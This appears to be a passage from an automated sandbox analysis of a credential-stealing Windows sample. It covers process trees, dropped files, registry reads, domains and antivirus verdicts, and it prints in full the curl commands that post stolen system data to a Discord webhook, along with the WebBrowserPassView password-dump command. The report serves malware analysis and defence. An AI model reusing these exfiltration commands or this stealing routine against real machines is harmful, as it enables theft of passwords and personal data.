Unmonitor End Time End Time: 227556, Reason: Terminated
Monitor Duration 3.35s
Return Code 0
PID 4520
Parent PID 4936
Bitness 64 Bit
Process #26: systeminfo.exe
ID 26
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 226145, Reason: Child Process
Unmonitor End Time End Time: 229294, Reason: Terminated
Monitor Duration 3.15s
Return Code 0
PID 4764
Parent PID 4936
Bitness 64 Bit
Process #27: findstr.exe
ID 27
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"System Model"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 226289, Reason: Child Process
Unmonitor End Time End Time: 229312, Reason: Terminated
Monitor Duration 3.02s
Return Code 0
PID 4812
Parent PID 4936
Bitness 64 Bit
Process #28: systeminfo.exe
ID 28
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 228326, Reason: Child Process
Unmonitor End Time End Time: 231578, Reason: Terminated
Monitor Duration 3.25s
Return Code 0
PID 4916
Parent PID 4936
Bitness 64 Bit
Process #29: findstr.exe
ID 29
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"System type"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 228450, Reason: Child Process
Unmonitor End Time End Time: 231582, Reason: Terminated
Monitor Duration 3.13s
Return Code 1
PID 3832
Parent PID 4936
Bitness 64 Bit
Process #30: systeminfo.exe
ID 30
Filename c:\windows\system32\systeminfo.exe
Command Line systeminfo
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 230598, Reason: Child Process
Unmonitor End Time End Time: 234305, Reason: Terminated
Monitor Duration 3.71s
Return Code 0
PID 2288
Parent PID 4936
Bitness 64 Bit
Process #31: findstr.exe
ID 31
Filename c:\windows\system32\findstr.exe
Command Line findstr /c:"Total Physical Memory"
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 230775, Reason: Child Process
Unmonitor End Time End Time: 234310, Reason: Terminated
Monitor Duration 3.54s
Return Code 0
PID 3332
Parent PID 4936
Bitness 64 Bit
Process #32: wmic.exe
ID 32
Filename c:\windows\system32\wbem\wmic.exe
Command Line wmic diskdrive get size
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 233309, Reason: Child Process
Unmonitor End Time End Time: 237008, Reason: Terminated
Monitor Duration 3.70s
Return Code 0
PID 1320
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 10
COM 10
System 8
Registry 5
File 9
- 1
Process #35: wmic.exe
ID 35
Filename c:\windows\system32\wbem\wmic.exe
Command Line wmic bios get serialnumber
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 235584, Reason: Child Process
Unmonitor End Time End Time: 237898, Reason: Terminated
Monitor Duration 2.31s
Return Code 0
PID 4944
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 10
COM 10
System 8
Registry 5
File 9
- 1
Process #36: wmic.exe
ID 36
Filename c:\windows\system32\wbem\wmic.exe
Command Line wmic cpu get name
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 236967, Reason: Child Process
Unmonitor End Time End Time: 239351, Reason: Terminated
Monitor Duration 2.38s
Return Code 0
PID 3020
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 10
COM 10
System 8
Registry 5
File 9
- 1
Process #37: curl.exe
ID 37
Filename c:\temp\curl.exe
Command Line C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**RDhJ0CNFevzX**\n```asciidoc\nTime and Date :: ...... n\"}" https://discordapp.com/api/webhooks/823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 238414, Reason: Child Process
Unmonitor End Time End Time: 240999, Reason: Terminated
Monitor Duration 2.58s
Return Code 0
PID 1056
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Environment 21
File 13
Module 14
System 101
Network Behavior
Type Count
DNS 1
TCP 3
Process #38: filed.exe
ID 38
Filename c:\temp\filed.exe
Command Line "C:\temp\filed.exe" --processStart filed.exe
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 239769, Reason: Child Process
Unmonitor End Time End Time: 263598, Reason: Crashed
Monitor Duration 23.83s
Return Code 3762504530 (0xE0434352, the status code of an unhandled .NET CLR exception; consistent with the WerFault.exe child below)
PID 1428
Parent PID 4936
Bitness 32 Bit
Process #39: werfault.exe
ID 39
Filename c:\windows\syswow64\werfault.exe
Command Line C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 692
Initial Working Directory C:\Windows\system32\
Monitor Start Time Start Time: 246960, Reason: Child Process
Unmonitor End Time End Time: 263478, Reason: Terminated
Monitor Duration 16.52s
Return Code 0
PID 2268
Parent PID 1428
Bitness 32 Bit
Host Behavior
Type Count
Module 69
Environment 21
File 3
Registry 30
Process #40: filed.exe
ID 40
Filename c:\temp\filed.exe
Command Line "C:\temp\filed.exe" --processStart filed.exe
Initial Working Directory C:\Windows\
Monitor Start Time Start Time: 249637, Reason: Child Process
Unmonitor End Time End Time: 262905, Reason: Terminated
Monitor Duration 13.27s
Return Code 259 (0x103, STILL_ACTIVE)
PID 3336
Parent PID 1428
Bitness 32 Bit
Process #42: timeout.exe
ID 42
Filename c:\windows\system32\timeout.exe
Command Line timeout 5
Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\
Monitor Start Time Start Time: 262202, Reason: Child Process
Unmonitor End Time End Time: 269128, Reason: Terminated
Monitor Duration 6.93s
Return Code 0
PID 1988
Parent PID 4936
Bitness 64 Bit
Host Behavior
Type Count
Module 2
System 93
File 44
ARTIFACTS
File
SHA256 | Filenames | Category | Filesize | MIME Type | Operations | Verdict
129fd5ce9840c318148335527b70b1a6b8df1e1c0005f24d06b28130df7ed056 | C:\Users\RDhJ0CNFevzX\Desktop\Project_Genocide_V5.1.1-.exe | Sample File | 13847.00 KB | application/vnd.microsoft.portable-executable | | MALICIOUS
d4bde482cc419f200f9f3a2fb284f3ead1ed3c5fe9e8581dbe4acbce68f8b11e | C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe | Dropped File | 10.00 KB | application/vnd.microsoft.portable-executable | Access, Write, Create | MALICIOUS
f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe | C:\temp\WebBrowserPassView.exe | Dropped File | 391.50 KB | application/vnd.microsoft.portable-executable | Access, Write, Create | MALICIOUS
f76ba0c9cc7614a11a7e1217e2e738196d6da56dec9c96f90a8a64d9f80a4493 | C:\temp\finalres.vbs | Dropped File | 2.21 KB | text/plain | Access, Write, Create | SUSPICIOUS
2bbd7b9dd041c4d84a451033b257d7db2f23e6475f2e5d6e085e2e6f89043338 | C:\temp\curl.exe | Dropped File | 4256.62 KB | application/vnd.microsoft.portable-executable | Access, Write, Create | SUSPICIOUS
c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858 | c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat | Modified File | 128 bytes | application/octet-stream | | CLEAN
7001466b051e89556abb7f438c9b9cafba66a5d121de17082bd6423b7333e3aa | C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Jmbwoud.rar | Dropped File | 10240.00 KB | application/x-rar-compressed | Access, Write, Create | CLEAN
32bc4c92173d817cb245c95505b26304e3c242ab1ba77bcce003727e6edecb29 | C:\temp\finalres.bat | Dropped File | 3.93 KB | text/x-msdos-batch | Access, Write, Create | CLEAN
04084885435b6134e792c03f8b52bf6ea7135c7bd7ff8d3cc3aaedae2c667dae | C:\temp\finalres2.vbs | Dropped File | 344 bytes | text/plain | Access, Delete, Write, Create | CLEAN
2782f0f8e89c786f40240fc1916677be660fb8d8e25dede50c9f6f7b0c2c2178 | C:\temp\curl-ca-bundle.crt | Dropped File | 216.96 KB | text/plain | Access, Write, Create | CLEAN
9313c411f761f8215e7e73f7dc3486f5d10b8556a1164c3277791e312a80b686 | C:\temp\WindowsInfo.txt | Dropped File | 113 bytes | text/plain | Read, Access, Write, Create | CLEAN
fd41cd2f48623ceb8d6d4fa774c80efa5c3f22c94bfd7a7c59543772b585d9a1 | C:\temp\ip_address.txt | Dropped File | 12 bytes | text/plain | Read, Access, Create | CLEAN
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 | C:/temp/RDhJ0CNFevzX_Passwords.txt, C:\temp\RDhJ0CNFevzX_Passwords.txt | Dropped File | 2 bytes | text/plain | Access, Write, Create | CLEAN
05925f6e122be36382458c1668c4b40c16809b3e2ad5e65fde35f9ad52cef072 | C:\temp\System_INFO.txt | Dropped File | 678 bytes | application/octet-stream | Access, Create | CLEAN
Filename
Filename Category Operations Verdict
C:\Users\RDhJ0CNFevzX\Desktop\Project_Genocide_V5.1.1-.exe.config Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe Dropped File Access, Write, Create CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Jmbwoud.rar Dropped File Access, Write, Create CLEAN
C:\temp Accessed File Access, Create CLEAN
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config Accessed File Read, Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe.config Accessed File Access CLEAN
C:\temp\finalres.bat Dropped File Access, Write, Create CLEAN
C:\temp\finalres.vbs Dropped File Access, Write, Create CLEAN
C:\temp\finalres2.vbs Dropped File Access, Delete, Write, Create CLEAN
C:\temp\WebBrowserPassView.exe Dropped File Access, Write, Create CLEAN
C:\temp\curl-ca-bundle.crt Dropped File Access, Write, Create CLEAN
C:\temp\curl.exe Dropped File Access, Write, Create CLEAN
C:\Windows\System32\WScript.exe Accessed File Access CLEAN
C:\temp\WindowsInfo.txt Dropped File Read, Access, Write, Create CLEAN
"C:\temp\finalres.bat" Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\.curlrc Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\_curlrc Accessed File Access CLEAN
C:\temp\.curlrc Accessed File Access CLEAN
C:\temp\_curlrc Accessed File Access CLEAN
C:/Windows/System32/OpenSSL/ssl/openssl.cnf Accessed File Access CLEAN
C:\temp\ip_address.txt Dropped File Read, Access, Create CLEAN
C:\temp\System_INFO.txt Dropped File Access, Create CLEAN
C:\temp\WebBrowserPassView_lng.ini Accessed File Access CLEAN
C:\temp\WebBrowserPassView.cfg Accessed File Read, Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat Accessed File Access CLEAN
C:\Windows\System32\winlogon.exe Accessed File Access CLEAN
C:\Windows\System32\lsass.exe Accessed File Access CLEAN
C:\Windows\System32\svchost.exe Accessed File Access CLEAN
C:\Windows\System32\dwm.exe Accessed File Access CLEAN
C:\Windows\System32\spoolsv.exe Accessed File Access CLEAN
C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe Accessed File Access CLEAN
C:\Windows\System32\sihost.exe Accessed File Access CLEAN
C:\Windows\System32\taskhostw.exe Accessed File Access CLEAN
C:\Windows\explorer.exe Accessed File Access CLEAN
C:\Windows\System32\RuntimeBroker.exe Accessed File Access CLEAN
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Accessed File Access CLEAN
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Accessed File Access CLEAN
C:\Windows\System32\wbem\WMIADAP.exe Accessed File Access CLEAN
C:\Windows\System32\backgroundTaskHost.exe Accessed File Access CLEAN
C:\Windows\System32\wbem\WmiPrvSE.exe Accessed File Access CLEAN
C:\Program Files\WindowsApps\Microsoft.Messaging_1.10.22012.0_x86__8wekyb3d8bbwe\SkypeHost.exe Accessed File Access CLEAN
C:\Program Files\Internet Explorer\iexplore.exe Accessed File Access CLEAN
C:\Program Files (x86)\Internet Explorer\iexplore.exe Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\always-source.exe Accessed File Access CLEAN
C:\Program Files\Windows Photo Viewer\knowseveralcharacter.exe Accessed File Access CLEAN
C:\Program Files\Common Files\result.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows NT\audience-hold.exe Accessed File Access CLEAN
C:\Program Files\Uninstall Information\daughter_hang_others.exe Accessed File Access CLEAN
C:\Program Files\Windows Portable Devices\section step.exe Accessed File Access CLEAN
C:\Program Files\MSBuild\addwide.exe Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft Office\stuff_must.exe Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft.NET\consider represent.exe Accessed File Access CLEAN
C:\Program Files (x86)\Common Files\age.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Defender\every.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Portable Devices\season_contain_spring.exe Accessed File Access CLEAN
C:\Program Files\Internet Explorer\maintain.exe Accessed File Access CLEAN
C:\Program Files\Windows Sidebar\scientist.exe Accessed File Access CLEAN
C:\Program Files (x86)\Reference Assemblies\compare several.exe Accessed File Access CLEAN
C:\Program Files (x86)\MSBuild\call themselves surface.exe Accessed File Access CLEAN
C:\Program Files\MSBuild\project.exe Accessed File Access CLEAN
C:\Program Files\Windows Sidebar\identify.exe Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft.NET\3dftp.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Photo Viewer\absolutetelnet.exe Accessed File Access CLEAN
C:\Program Files (x86)\Internet Explorer\alftp.exe Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\barca.exe Accessed File Access CLEAN
C:\Program Files\Uninstall Information\bitkinex.exe Accessed File Access CLEAN
C:\Program Files\Windows Media Player\coreftp.exe Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\far.exe Accessed File Access CLEAN
C:\Program Files\MSBuild\filezilla.exe Accessed File Access CLEAN
C:\Program Files\Uninstall Information\flashfxp.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Defender\fling.exe Accessed File Access CLEAN
C:\Program Files\Windows Portable Devices\foxmailincmail.exe Accessed File Access CLEAN
C:\Program Files\Common Files\gmailnotifierpro.exe Accessed File Access CLEAN
C:\Program Files (x86)\Reference Assemblies\icq.exe Accessed File Access CLEAN
C:\Program Files\Windows Multimedia Platform\leechftp.exe Accessed File Access CLEAN
C:\Program Files\Windows Portable Devices\ncftp.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Photo Viewer\notepad.exe Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft Office\operamail.exe Accessed File Access CLEAN
C:\Program Files\Windows Mail\outlook.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows NT\pidgin.exe Accessed File Access CLEAN
C:\Program Files\Windows Sidebar\scriptftp.exe Accessed File Access CLEAN
C:\Program Files\Windows Media Player\skype.exe Accessed File Access CLEAN
C:\Program Files (x86)\MSBuild\smartftp.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Defender\thunderbird.exe Accessed File Access CLEAN
C:\Program Files\Internet Explorer\trillian.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Sidebar\webdrive.exe Accessed File Access CLEAN
C:\Program Files (x86)\Reference Assemblies\whatsapp.exe Accessed File Access CLEAN
C:\Program Files\Windows Multimedia Platform\winscp.exe Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\yahoomessenger.exe Accessed File Access CLEAN
C:\Program Files (x86)\Reference Assemblies\active-charge.exe Accessed File Access CLEAN
C:\Program Files\Windows Media Player\accupos.exe Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\afr38.exe Accessed File Access CLEAN
C:\Program Files (x86)\MSBuild\aldelo.exe Accessed File Access CLEAN
C:\Program Files\Windows Multimedia Platform\ccv_server.exe Accessed File Access CLEAN
C:\Program Files\Common Files\centralcreditcard.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Media Player\creditservice.exe Accessed File Access CLEAN
C:\Program Files\Windows Photo Viewer\edcsvr.exe Accessed File Access CLEAN
C:\Program Files\Common Files\fpos.exe Accessed File Access CLEAN
C:\Program Files\Uninstall Information\isspos.exe Accessed File Access CLEAN
C:\Program Files\Windows Sidebar\mxslipstream.exe Accessed File Access CLEAN
C:\Program Files\Reference Assemblies\omnipos.exe Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\spcwin.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Photo Viewer\spgagentservice.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Photo Viewer\utg2.exe Accessed File Access CLEAN
C:\Program Files (x86)\Windows Portable Devices\activity send best.exe Accessed File Access CLEAN
C:\Program Files\Windows Photo Viewer\necessary_various.exe Accessed File Access CLEAN
C:\Program Files\Windows Portable Devices\firstquiteacross.exe Accessed File Access CLEAN
C:\Program Files\Windows Defender\left market.exe Accessed File Access CLEAN
C:\Windows\System32\wbem\WmiApSrv.exe Accessed File Access CLEAN
C:\Windows\System32\msfeedssync.exe Accessed File Access CLEAN
C:\Windows\System32\OpenWith.exe Accessed File Access CLEAN
C:\Windows\System32\cmd.exe Accessed File Access CLEAN
C:\Windows\System32\conhost.exe Accessed File Access CLEAN
C:\Windows\System32\systeminfo.exe Accessed File Access CLEAN
C:\Windows\System32\findstr.exe Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Mozilla\Firefox\profiles.ini Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Waterfox\profiles.ini Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Local\Vivaldi\User Data\Default\Login Data Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Apple Computer\Preferences\keychain.plist Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Opera\Opera\wand.dat Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Opera\Opera7\profile\wand.dat Accessed File Access CLEAN
C:\Users\RDhJ0CNFevzX\AppData\Roaming\Opera Software\Opera Stable\Login Data Accessed File Access CLEAN
C:/temp/RDhJ0CNFevzX_Passwords.txt Dropped File Access, Write, Create CLEAN
C:\Windows\system32\wbem\XSL-Mappings.xml Accessed File Access CLEAN
C:\Windows\system32\wbem\\texttable.xsl Accessed File Access CLEAN
echo. Accessed File Access CLEAN
"C:\temp\filed.exe" Accessed File Access CLEAN
C:\Windows\SysWOW64\WerFault.exe Accessed File Access CLEAN
"C:\temp\CustomEXE.exe" Accessed File Access CLEAN
NUL Accessed File Access, Create CLEAN
C:\Windows\system32\timeout.exe Accessed File Access CLEAN
C:\temp\filed.exe Accessed File Access CLEAN
\??\C:\temp\filed.exe Accessed File Access CLEAN
\??\C:\temp\ip_address.txt Accessed File Access CLEAN
\??\C:\temp\WindowsInfo.txt Accessed File Access CLEAN
C:\temp\RDhJ0CNFevzX_Passwords.txt Dropped File Access CLEAN
\??\C:\temp\RDhJ0CNFevzX_Passwords.txt Accessed File Access CLEAN
\??\C:\temp\curl-ca-bundle.crt Accessed File Access CLEAN
\??\C:\temp\curl.exe Accessed File Access CLEAN
C:\temp\CustomEXE.exe Accessed File Access CLEAN
\??\C:\temp\finalres.bat Accessed File Access CLEAN
URL
URL Category IP Address Country HTTP Methods Verdict
https://discordapp.com/api/webhooks/823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T CLEAN
https://myexternalip.com/raw CLEAN
Domain
Domain IP Address Country Protocols Verdict
discordapp.com 162.159.135.233, 162.159.129.233, 162.159.133.233, 162.159.134.233, 162.159.130.233 HTTPS, DNS, HTTP CLEAN
myexternalip.com 216.239.32.21, 216.239.38.21, 216.239.36.21, 216.239.34.21 HTTPS, DNS, HTTP CLEAN
cdn.discordapp.com 162.159.129.233, 162.159.133.233, 162.159.134.233, 162.159.135.233, 162.159.130.233 DNS CLEAN
raw.githubusercontent.com 185.199.110.133, 185.199.111.133, 185.199.108.133, 185.199.109.133 DNS CLEAN
github.com 140.82.121.4 DNS CLEAN
IP
IP Address Domains Country Protocols Verdict
94.114.3.195 Germany CLEAN
192.168.0.1 - UDP, DNS CLEAN
185.199.109.133 raw.githubusercontent.com United States TCP, DNS, HTTPS CLEAN
162.159.130.233 discordapp.com, cdn.discordapp.com - TCP, DNS, HTTPS CLEAN
140.82.121.4 github.com United States TCP, DNS, HTTPS CLEAN
216.239.34.21 myexternalip.com United States TCP, DNS CLEAN
162.159.133.233 discordapp.com, cdn.discordapp.com - DNS CLEAN
162.159.135.233 discordapp.com, cdn.discordapp.com - DNS CLEAN
162.159.129.233 discordapp.com, cdn.discordapp.com - DNS CLEAN
162.159.134.233 discordapp.com, cdn.discordapp.com - DNS CLEAN
185.199.108.133 raw.githubusercontent.com United States DNS CLEAN
185.199.111.133 raw.githubusercontent.com United States DNS CLEAN
185.199.110.133 raw.githubusercontent.com United States DNS CLEAN
216.239.32.21 myexternalip.com United States DNS CLEAN
216.239.36.21 myexternalip.com United States DNS CLEAN
216.239.38.21 myexternalip.com United States DNS CLEAN
127.0.0.1 - TCP CLEAN
-
Email Address
-
Mutex
-
Registry
Registry Key Operations Parent Process Name Verdict
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework access project_genocide_v5.1.1-.exe, werfault.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgJITDebugLaunchSetting read, access project_genocide_v5.1.1-.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgManagedDebugger read, access project_genocide_v5.1.1-.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML access khaaksqr.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\InstallationType read, access khaaksqr.exe CLEAN
HKEY_CURRENT_USER access khaaksqr.exe CLEAN
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\LegacyWPADSupport read, access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\TZI read, access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Display read, access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Std read, access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\MUI_Dlt read, access khaaksqr.exe CLEAN
HKEY_PERFORMANCE_DATA access khaaksqr.exe, project_genocide_v5.1.1-.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\HWRPortReuseOnSocketBind read, access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SchUseStrongCrypto read, access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\System.Net.ServicePointManager.SecurityProtocol access khaaksqr.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion access wscript.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId read, access wscript.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName read, access wscript.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID read, access wscript.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 access webbrowserpassview.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM access wmic.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM\Logging read, access wmic.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM\Logging Directory read, access wmic.exe CLEAN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM\Log File Max Size read, access wmic.exe CLEAN
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework access werfault.exe CLEAN
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\DbgDACSkipVerifyDlls read, access werfault.exe CLEAN
Process
Process Name Commandline Verdict
project_genocide_v5.1.1-.exe "C:\Users\RDhJ0CNFevzX\Desktop\Project_Genocide_V5.1.1-.exe" MALICIOUS
khaaksqr.exe "C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe" MALICIOUS
webbrowserpassview.exe C:/temp/WebBrowserPassView.exe /stext "C:/temp/RDhJ0CNFevzX_Passwords.txt" MALICIOUS
curl.exe C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**INJECTION STARTED!**\"}" https://discordapp.com/api/webhooks/823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T SUSPICIOUS
curl.exe C:/temp/curl "https://myexternalip.com/raw" SUSPICIOUS
wmic.exe wmic diskdrive get size SUSPICIOUS
wmic.exe wmic bios get serialnumber SUSPICIOUS
wmic.exe wmic cpu get name SUSPICIOUS
curl.exe C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**RDhJ0CNFevzX**\n```asciidoc\nTime and Date :: ...... n\"}" https://discordapp.com/api/webhooks/823564721483284501/QMQntkAnLImKnVmntNAKBfD7Snborid4Jzdex0GecVGObxNacU_ZS1T_PVgEGH6wfq6T SUSPICIOUS
openwith.exe C:\Windows\system32\OpenWith.exe -Embedding CLEAN
wscript.exe "C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs" CLEAN
wscript.exe "C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs" CLEAN
cmd.exe C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" " CLEAN
systeminfo.exe systeminfo CLEAN
findstr.exe findstr /c:"Host Name" CLEAN
findstr.exe findstr /c:"Domain" CLEAN
findstr.exe findstr /c:"OS Name" CLEAN
findstr.exe findstr /c:"OS Version" CLEAN
findstr.exe findstr /c:"System Manufacturer" CLEAN
findstr.exe findstr /c:"System Model" CLEAN
findstr.exe findstr /c:"System type" CLEAN
findstr.exe findstr /c:"Total Physical Memory" CLEAN
filed.exe "C:\temp\filed.exe" --processStart filed.exe CLEAN
werfault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 692 CLEAN
timeout.exe timeout 5 CLEAN
YARA / AV
YARA (1)
Ruleset Name Rule Name Rule Description File Type Filename Classification Verdict
Generic PowerShell_Registry_Commands PowerShell may attempt to read/write system registry Dropped File C:\temp\finalres.vbs 2/5
Antivirus (3)
File Type Threat Name Filename Verdict
SAMPLE Gen:Variant.Razy.680050 C:\Users\RDhJ0CNFevzX\Desktop\Project_Genocide_V5.1.1-.exe MALICIOUS
DROPPED Gen:Variant.Agentus.62 C:\Users\RDhJ0CNFevzX\AppData\Local\Temp\Khaaksqr.exe MALICIOUS
DROPPED Gen:Application.Heur.yq0@kibVd8eO C:\temp\WebBrowserPassView.exe SUSPICIOUS
ENVIRONMENT
Virtual Machine Information
